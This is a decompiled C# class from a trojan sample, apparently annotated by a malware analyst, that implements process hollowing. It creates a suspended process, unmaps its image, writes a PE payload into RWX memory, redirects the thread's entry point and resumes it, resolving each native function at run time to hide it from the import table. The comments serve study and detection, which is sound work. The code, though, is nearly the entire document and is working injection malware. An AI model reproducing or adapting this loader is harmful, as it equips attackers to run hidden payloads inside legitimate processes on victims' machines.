// Decompiled with JetBrains decompiler
// Type:
// Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe
using System;
using System.Runtime.InteropServices;
// Analyst annotation (identifiers are obfuscated private-use code points; the
// names used in these comments are inferred from field layout, constants and
// delegate parameter names, not recovered from the binary).
//
// This type holds a single public routine that parses a byte array as a 32-bit
// PE image and maps it into a newly created, suspended child process before
// resuming it. The call sequence is consistent with process hollowing
// (MITRE ATT&CK T1055.012). Only GetProcAddress and GetModuleHandle are
// imported statically; every other native function is resolved at run time
// from names produced by \uE00B.\uE000(int), which is not defined on this page
// (presumably a string-decoding helper in another type).
//
// Detection-relevant behaviour visible here: a process created with creation
// flag 4, a cross-process allocation with protection 0x40 at the payload's
// preferred base, repeated cross-process writes, a thread-context rewrite, and
// a thread resume, all from a managed assembly whose import table shows
// none of those functions.
internal class \uE00A
{
    // Static import used to resolve the address of an export by name.
    [DllImport("kernel32", EntryPoint = "GetProcAddress")]
    private static extern IntPtr \uE000(IntPtr _param0, string _param1);

    // Static import used to obtain the handle of an already-loaded module.
    [DllImport("kernel32", EntryPoint = "GetModuleHandle")]
    private static extern IntPtr \uE000(string _param0);

    // Maps the PE image in _param0 into a new suspended process and resumes it.
    //   _param0: raw bytes, validated below as an MZ/PE image.
    //   _param1: passed to the process-creation delegate as lpCommandLine.
    //   _param2: passed to the process-creation delegate as lpApplicationName.
    // Returns nothing; apart from the header check and the allocation call,
    // no native return value is checked (num1..num8 are discarded).
    public static void \uE000(byte[] _param0, string _param1, string _param2)
    {
        \uE00A.\uE017 obj = new \uE00A.\uE017();
        ref \uE00A.\uE017 local1 = ref obj;
        \uE00A.\uE01B structure1 = new \uE00A.\uE01B();
        ref \uE00A.\uE01B local2 = ref structure1;
        \uE00A.\uE01E structure2 = new \uE00A.\uE01E();
        ref \uE00A.\uE01E local3 = ref structure2;
        \uE00A.\uE014 lpStartupInfo = new \uE00A.\uE014();
        \uE00A.\uE015 lpProcessInformation = new \uE00A.\uE015();
        \uE00A.\uE01D lpContext = new \uE00A.\uE01D();
        // First field of the startup structure receives the structure size.
        lpStartupInfo.\uE000 = (uint) Marshal.SizeOf((object) lpStartupInfo);
        // 65543 == 0x00010007, the same value as \uE011.\uE008 below
        // (looks like the x86 CONTEXT_FULL flag set; confirm against winnt.h).
        lpContext.\uE000 = 65543U;
        // The payload array is pinned only long enough to read its address.
        // The address is kept as a 32-bit int, so this routine assumes a
        // 32-bit process.
        GCHandle gcHandle = GCHandle.Alloc((object) _param0, GCHandleType.Pinned);
        int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
        // NOTE(analysis): the pin is released here, yet the raw address is
        // still dereferenced by the PtrToStructure calls that follow.
        gcHandle.Free();
        // Read the header at offset 0, then the header located at the offset
        // stored in its last field (\uE012).
        obj = (\uE00A.\uE017) Marshal.PtrToStructure((IntPtr) int32, typeof (\uE00A.\uE017));
        structure1 = (\uE00A.\uE01B) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012), typeof (\uE00A.\uE01B));
        // 17744 == 0x4550 ("PE\0\0") and 23117 == 0x5A4D ("MZ"): bail out
        // silently unless the buffer carries both signatures.
        if (structure1.\uE000 != 17744U || obj.\uE000 != (ushort) 23117)
            return;
        // Run-time resolution of seven native functions. Module and export
        // names come from \uE00B.\uE000(index); index 60 names the module for
        // six of them and index 88 for the second one. The delegate shapes
        // (see declarations below) match, in order: CreateProcess, a
        // two-argument unmap call (presumably NtUnmapViewOfSection),
        // VirtualAllocEx, WriteProcessMemory, GetThreadContext,
        // SetThreadContext and ResumeThread. Confirm by decoding the strings.
        \uE00A.\uE009 forFunctionPointer1 = (\uE00A.\uE009) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(73)), typeof (\uE00A.\uE009));
        \uE00A.\uE00B forFunctionPointer2 = (\uE00A.\uE00B) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(88)), \uE00B.\uE000(98)), typeof (\uE00A.\uE00B));
        \uE00A.\uE00C forFunctionPointer3 = (\uE00A.\uE00C) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(119)), typeof (\uE00A.\uE00C));
        \uE00A.\uE00A forFunctionPointer4 = (\uE00A.\uE00A) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(134)), typeof (\uE00A.\uE00A));
        \uE00A.\uE00D forFunctionPointer5 = (\uE00A.\uE00D) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(153)), typeof (\uE00A.\uE00D));
        \uE00A.\uE00E forFunctionPointer6 = (\uE00A.\uE00E) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(170)), typeof (\uE00A.\uE00E));
        \uE00A.\uE00F forFunctionPointer7 = (\uE00A.\uE00F) Marshal.GetDelegateForFunctionPointer(\uE00A.\uE000(\uE00A.\uE000(\uE00B.\uE000(60)), \uE00B.\uE000(187)), typeof (\uE00A.\uE00F));
        // Create the host process with creation flag \uE010.\uE009 (value 4,
        // the suspended-start flag), no handle inheritance, default
        // environment and directory.
        int num1 = forFunctionPointer1(_param2, _param1, IntPtr.Zero, IntPtr.Zero, false, \uE00A.\uE010.\uE009, IntPtr.Zero, (string) null, ref lpStartupInfo, out lpProcessInformation) ? 1 : 0;
        // Unmap whatever the child has mapped at the payload's preferred base
        // (\uE002.\uE009 sits at the ImageBase position of the optional header).
        int num2 = forFunctionPointer2(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009) ? 1 : 0;
        // Allocate \uE002.\uE013 bytes (SizeOfImage position) at that base in
        // the child: allocation type 0x1000 | 0x2000, protection 0x40
        // (read/write/execute). On failure the routine returns without
        // terminating the suspended child or closing its handles.
        if (!forFunctionPointer3(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, structure1.\uE002.\uE013, \uE00A.\uE013.\uE000 | \uE00A.\uE013.\uE001, \uE00A.\uE012.\uE002))
            return;
        // Copy the first \uE002.\uE014 bytes of the payload (SizeOfHeaders
        // position) to the start of the new region.
        int num3 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) structure1.\uE002.\uE009, _param0, structure1.\uE002.\uE014, (object) null) ? 1 : 0;
        // One iteration per section; the count is read from \uE001.\uE001
        // (NumberOfSections position of the file header).
        for (int index1 = 0; index1 <= (int) structure1.\uE001.\uE001 - 1; ++index1)
        {
            // Section header i follows the second header structure directly.
            structure2 = (\uE00A.\uE01E) Marshal.PtrToStructure((IntPtr) (int32 + obj.\uE012 + Marshal.SizeOf((object) structure1) + Marshal.SizeOf((object) structure2) * index1), typeof (\uE00A.\uE01E));
            // Copy \uE003 bytes (raw size) starting at file offset \uE004 ...
            byte[] lpBuffer = new byte[(IntPtr) structure2.\uE003];
            for (int index2 = 0; index2 <= (int) structure2.\uE003 - 1; ++index2)
                lpBuffer[index2] = _param0[(long) structure2.\uE004 + (long) index2];
            // ... and write them into the child at base + \uE002 (the
            // section's virtual address position).
            int num4 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (structure1.\uE002.\uE009 + structure2.\uE002), lpBuffer, structure2.\uE003, (object) null) ? 1 : 0;
        }
        // Fetch the register context of the child's suspended primary thread.
        int num5 = forFunctionPointer5(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
        // Write the new image base 8 bytes past the address held in context
        // field \uE00E (the Ebx slot in an x86 CONTEXT layout; presumably the
        // PEB image-base field, confirm).
        byte[] bytes = BitConverter.GetBytes(structure1.\uE002.\uE009);
        int num6 = forFunctionPointer4(lpProcessInformation.\uE000, (IntPtr) (long) (lpContext.\uE00E + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
        // Context field \uE011 (the Eax slot) is set to base + \uE002.\uE006
        // (AddressOfEntryPoint position), i.e. the payload's entry point.
        lpContext.\uE011 = structure1.\uE002.\uE009 + structure1.\uE002.\uE006;
        // Apply the modified context and let the thread run.
        int num7 = forFunctionPointer6(lpProcessInformation.\uE001, ref lpContext) ? 1 : 0;
        int num8 = (int) forFunctionPointer7(lpProcessInformation.\uE001);
    }

    // Delegate for the process-creation call; parameter names and order match
    // CreateProcess.
    private delegate bool \uE009(
        string lpApplicationName,
        string lpCommandLine,
        IntPtr lpProcessAttributes,
        IntPtr lpThreadAttributes,
        bool bInheritHandles,
        \uE00A.\uE010 dwCreationFlags,
        IntPtr lpEnvironment,
        string lpCurrentDirectory,
        ref \uE00A.\uE014 lpStartupInfo,
        out \uE00A.\uE015 lpProcessInformation);

    // Delegate for the cross-process write; parameter names match
    // WriteProcessMemory. The caller always passes null for the byte count.
    private delegate bool \uE00A(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] lpBuffer,
        uint nSize,
        object lpNumberOfBytesWritten);

    // Delegate for the unmap call; it is the only one resolved from the module
    // named by string index 88 rather than 60.
    private delegate bool \uE00B(IntPtr hProcess, IntPtr lpBaseAddress);

    // Delegate for the cross-process allocation; parameter names match
    // VirtualAllocEx. Declared as returning bool, so the caller only tests
    // the result for non-zero.
    private delegate bool \uE00C(
        IntPtr hProcess,
        IntPtr lpAddress,
        uint dwSize,
        \uE00A.\uE013 flAllocationType,
        \uE00A.\uE012 flProtect);

    // Delegate for reading a thread's context (shape of GetThreadContext).
    private delegate bool \uE00D(IntPtr hThread, ref \uE00A.\uE01D lpContext);

    // Delegate for writing a thread's context (shape of SetThreadContext).
    private delegate bool \uE00E(IntPtr hThread, [In] ref \uE00A.\uE01D lpContext);

    // Delegate for resuming a thread (shape of ResumeThread).
    private delegate uint \uE00F(IntPtr hThread);

    // Values match the Win32 process-creation flag set. Only \uE009 (4) is
    // used by the visible code.
    private enum \uE010 : uint
    {
        \uE00C = 1,
        \uE00B = 2,
        \uE009 = 4,
        \uE00D = 8,
        \uE002 = 16, // 0x00000010
        \uE003 = 512, // 0x00000200
        \uE00A = 1024, // 0x00000400
        \uE007 = 2048, // 0x00000800
        \uE008 = 4096, // 0x00001000
        \uE00F = 65536, // 0x00010000
        \uE005 = 262144, // 0x00040000
        \uE00E = 524288, // 0x00080000
        \uE000 = 16777216, // 0x01000000
        \uE006 = 33554432, // 0x02000000
        \uE001 = 67108864, // 0x04000000
        \uE004 = 134217728, // 0x08000000
    }

    // Values match the x86 thread-context flag set (0x00010000 base). The
    // enum itself is not referenced by the visible code; the routine above
    // uses the literal 65543, equal to \uE008.
    private enum \uE011 : uint
    {
        \uE000 = 65536, // 0x00010000
        \uE001 = 65536, // 0x00010000
        \uE002 = 65537, // 0x00010001
        \uE003 = 65538, // 0x00010002
        \uE004 = 65540, // 0x00010004
        \uE008 = 65543, // 0x00010007
        \uE005 = 65544, // 0x00010008
        \uE006 = 65552, // 0x00010010
        \uE007 = 65568, // 0x00010020
        \uE009 = 65599, // 0x0001003F
    }

    // Values match the Win32 page-protection constants. Only \uE002 (0x40,
    // execute + read + write) is used by the visible code.
    private enum \uE012 : uint
    {
        \uE004 = 1,
        \uE005 = 2,
        \uE006 = 4,
        \uE007 = 8,
        \uE000 = 16, // 0x00000010
        \uE001 = 32, // 0x00000020
        \uE002 = 64, // 0x00000040
        \uE003 = 128, // 0x00000080
        \uE008 = 256, // 0x00000100
        \uE009 = 512, // 0x00000200
        \uE00A = 1024, // 0x00000400
    }

    // Values match the Win32 memory-allocation type constants. The visible
    // code combines \uE000 (0x1000) and \uE001 (0x2000).
    private enum \uE013 : uint
    {
        \uE000 = 4096, // 0x00001000
        \uE001 = 8192, // 0x00002000
        \uE002 = 524288, // 0x00080000
        \uE005 = 1048576, // 0x00100000
        \uE006 = 2097152, // 0x00200000
        \uE004 = 4194304, // 0x00400000
        \uE003 = 536870912, // 0x20000000
    }

    // Passed as lpStartupInfo; field layout is consistent with STARTUPINFO.
    // Only \uE000 (the size field) is written by the visible code.
    private struct \uE014
    {
        public uint \uE000;
        public string \uE001;
        public string \uE002;
        public string \uE003;
        public uint \uE004;
        public uint \uE005;
        public uint \uE006;
        public uint \uE007;
        public uint \uE008;
        public uint \uE009;
        public uint \uE00A;
        public uint \uE00B;
        public short \uE00C;
        public short \uE00D;
        public IntPtr \uE00E;
        public IntPtr \uE00F;
        public IntPtr \uE010;
        public IntPtr \uE011;
    }

    // Received as lpProcessInformation; layout is consistent with
    // PROCESS_INFORMATION. \uE000 is used as the process handle and \uE001 as
    // the thread handle by the routine above.
    private struct \uE015
    {
        public IntPtr \uE000;
        public IntPtr \uE001;
        public uint \uE002;
        public uint \uE003;
    }

    // Not referenced by the visible code; layout (int, pointer, bool)
    // resembles SECURITY_ATTRIBUTES. TODO confirm.
    private struct \uE016
    {
        public int \uE000;
        public IntPtr \uE001;
        public bool \uE002;
    }

    // Read from offset 0 of the payload; layout is consistent with
    // IMAGE_DOS_HEADER. \uE000 is compared with 0x5A4D and \uE012 is used as
    // the offset of the next header.
    private struct \uE017
    {
        public ushort \uE000;
        public ushort \uE001;
        public ushort \uE002;
        public ushort \uE003;
        public ushort \uE004;
        public ushort \uE005;
        public ushort \uE006;
        public ushort \uE007;
        public ushort \uE008;
        public ushort \uE009;
        public ushort \uE00A;
        public ushort \uE00B;
        public ushort \uE00C;
        public ushort \uE00D;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
        public ushort[] \uE00E;
        public ushort \uE00F;
        public ushort \uE010;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
        public ushort[] \uE011;
        public int \uE012;
    }

    // Layout is consistent with IMAGE_FILE_HEADER. \uE001 is used as the
    // section count.
    private struct \uE018
    {
        public ushort \uE000;
        public ushort \uE001;
        public uint \uE002;
        public uint \uE003;
        public uint \uE004;
        public ushort \uE005;
        public ushort \uE006;
    }

    // Two-uint entry used 16 times at the end of \uE01A; consistent with
    // IMAGE_DATA_DIRECTORY.
    private struct \uE019
    {
        public uint \uE000;
        public uint \uE001;
    }

    // Layout is consistent with the 32-bit IMAGE_OPTIONAL_HEADER. Fields read
    // by the routine above: \uE006 (entry-point offset), \uE009 (image base),
    // \uE013 (image size), \uE014 (header size).
    private struct \uE01A
    {
        public ushort \uE000;
        public byte \uE001;
        public byte \uE002;
        public uint \uE003;
        public uint \uE004;
        public uint \uE005;
        public uint \uE006;
        public uint \uE007;
        public uint \uE008;
        public uint \uE009;
        public uint \uE00A;
        public uint \uE00B;
        public ushort \uE00C;
        public ushort \uE00D;
        public ushort \uE00E;
        public ushort \uE00F;
        public ushort \uE010;
        public ushort \uE011;
        public uint \uE012;
        public uint \uE013;
        public uint \uE014;
        public uint \uE015;
        public ushort \uE016;
        public ushort \uE017;
        public uint \uE018;
        public uint \uE019;
        public uint \uE01A;
        public uint \uE01B;
        public uint \uE01C;
        public uint \uE01D;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
        public \uE00A.\uE019[] \uE01E;
    }

    // Signature + file header + optional header; consistent with the 32-bit
    // IMAGE_NT_HEADERS. \uE000 is compared with 0x4550.
    private struct \uE01B
    {
        public uint \uE000;
        public \uE00A.\uE018 \uE001;
        public \uE00A.\uE01A \uE002;
    }

    // Embedded in \uE01D as field \uE007; seven uints, an 80-byte array and a
    // trailing uint, consistent with the x86 FLOATING_SAVE_AREA.
    private struct \uE01C
    {
        public uint \uE000;
        public uint \uE001;
        public uint \uE002;
        public uint \uE003;
        public uint \uE004;
        public uint \uE005;
        public uint \uE006;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
        public byte[] \uE007;
        public uint \uE008;
    }

    // Passed as lpContext; layout is consistent with the x86 CONTEXT record.
    // The routine above sets \uE000 (flags), reads \uE00E and writes \uE011.
    private struct \uE01D
    {
        public uint \uE000;
        public uint \uE001;
        public uint \uE002;
        public uint \uE003;
        public uint \uE004;
        public uint \uE005;
        public uint \uE006;
        public \uE00A.\uE01C \uE007;
        public uint \uE008;
        public uint \uE009;
        public uint \uE00A;
        public uint \uE00B;
        public uint \uE00C;
        public uint \uE00D;
        public uint \uE00E;
        public uint \uE00F;
        public uint \uE010;
        public uint \uE011;
        public uint \uE012;
        public uint \uE013;
        public uint \uE014;
        public uint \uE015;
        public uint \uE016;
        public uint \uE017;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
        public byte[] \uE018;
    }

    // Read once per section; layout is consistent with IMAGE_SECTION_HEADER.
    // Fields read by the routine above: \uE002 (virtual address), \uE003 (raw
    // data size), \uE004 (raw data file offset).
    private struct \uE01E
    {
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
        public byte[] \uE000;
        public uint \uE001;
        public uint \uE002;
        public uint \uE003;
        public uint \uE004;
        public uint \uE005;
        public uint \uE006;
        public ushort \uE007;
        public ushort \uE008;
        public uint \uE009;
    }
}